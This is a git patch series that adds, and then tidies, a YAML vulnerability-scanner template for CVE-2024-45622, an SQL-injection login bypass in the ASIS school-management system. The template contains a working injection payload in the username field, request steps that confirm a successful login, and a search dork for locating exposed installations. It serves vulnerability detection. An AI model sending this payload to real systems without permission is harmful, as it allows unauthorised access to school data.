From e964d3de4e2fc261f495bb78494fb1a065ff1af9 Mon Sep 17 00:00:00 2001 From: Kazgangap Date: Mon, 16 Sep 2024 16:14:08 +0300 Subject: [PATCH 1/3] add CVE-2024-45622 --- http/cves/2024/CVE-2024-45622.yaml | 73 ++++++++++++++++++++++++++++++ 1 file changed, 73 insertions(+) create mode 100644 http/cves/2024/CVE-2024-45622.yaml diff --git a/http/cves/2024/CVE-2024-45622.yaml b/http/cves/2024/CVE-2024-45622.yaml new file mode 100644 index 0000000000..fc9de2823a --- /dev/null +++ b/http/cves/2024/CVE-2024-45622.yaml @@ -0,0 +1,73 @@ +id: CVE-2024-45622 + +info: + name: ASIS - SQL Injection Authentication Bypass + author: s4e-io + severity: critical + description: | + ASIS (aka Aplikasi Sistem Sekolah using CodeIgniter 3) 3.0.0 through 3.2.0 allows index.php username SQL injection for Authentication Bypass. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2024-45622 + - https://github.com/atoz-chevara/cve/blob/main/2024/ASIS_AplikasiSistemSekolah_Using_CodeIgniter3-SQL_Injection_Authentication_Bypass.md + - https://packetstormsecurity.com/files/181355/ASIS-3.2.0-SQL-Injection.html + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2024-45622 + cwe-id: CWE-89 + epss-score: 0.00043 + epss-percentile: 0.09586 + cpe: cpe:2.3:a:asis:asis:*:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 1 + vendor: asis + product: asis + google-dork: "ASIS | Aplikasi Sistem Sekolah" + tags: packetstorm,cve,cve2024,asis,codeigniter,sql-injection,authentication-bypass + +variables: + pass: "{{rand_base(10)}}" + +flow: http(1) && http(2) && http(3) + +http: + - raw: + - | + GET /asispanel/ HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: dsl + dsl: + - 'contains(body,"ASIS | Aplikasi Sistem Sekolah ")' + - 'status_code == 200' + condition: and + internal: true + + - raw: + - | + POST /asispanel/login/cek HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + username=%27+or+0%3D0+%23%23&password={{pass}}&submit=&submit= + + matchers: + - type: dsl + dsl: + - 'status_code == 303' + condition: and + internal: true + + - raw: + - | + GET /asispanel/home HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: dsl + dsl: + - 'contains(body, "Logout")' + - 'status_code == 200' + condition: and From e6033d5a58d6716fb512ee1556cda052b1bdffb5 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 17 Sep 2024 23:35:45 +0530 Subject: [PATCH 2/3] Update CVE-2024-45622.yaml --- http/cves/2024/CVE-2024-45622.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/cves/2024/CVE-2024-45622.yaml b/http/cves/2024/CVE-2024-45622.yaml index fc9de2823a..4cd76fecb8 100644 --- a/http/cves/2024/CVE-2024-45622.yaml +++ b/http/cves/2024/CVE-2024-45622.yaml @@ -24,7 +24,7 @@ info: vendor: asis product: asis google-dork: "ASIS | Aplikasi Sistem Sekolah" - tags: packetstorm,cve,cve2024,asis,codeigniter,sql-injection,authentication-bypass + tags: cve,cve2024,asis,auth-bypass,sqli,packetstorm variables: pass: "{{rand_base(10)}}" From 74337afc15354e2007fe037ae315f53272f8170c Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 19 Sep 2024 07:25:29 +0400 Subject: [PATCH 3/3] Update CVE-2024-45622.yaml --- http/cves/2024/CVE-2024-45622.yaml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/http/cves/2024/CVE-2024-45622.yaml b/http/cves/2024/CVE-2024-45622.yaml index 4cd76fecb8..0792eb8358 100644 --- a/http/cves/2024/CVE-2024-45622.yaml +++ b/http/cves/2024/CVE-2024-45622.yaml @@ -7,9 +7,9 @@ info: description: | ASIS (aka Aplikasi Sistem Sekolah using CodeIgniter 3) 3.0.0 through 3.2.0 allows index.php username SQL injection for Authentication Bypass. reference: - - https://nvd.nist.gov/vuln/detail/CVE-2024-45622 - https://github.com/atoz-chevara/cve/blob/main/2024/ASIS_AplikasiSistemSekolah_Using_CodeIgniter3-SQL_Injection_Authentication_Bypass.md - https://packetstormsecurity.com/files/181355/ASIS-3.2.0-SQL-Injection.html + - https://nvd.nist.gov/vuln/detail/CVE-2024-45622 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 @@ -20,11 +20,11 @@ info: cpe: cpe:2.3:a:asis:asis:*:*:*:*:*:*:*:* metadata: verified: true - max-request: 1 + max-request: 3 vendor: asis product: asis google-dork: "ASIS | Aplikasi Sistem Sekolah" - tags: cve,cve2024,asis,auth-bypass,sqli,packetstorm + tags: cve,cve2024,asis,auth-bypass,sqli variables: pass: "{{rand_base(10)}}"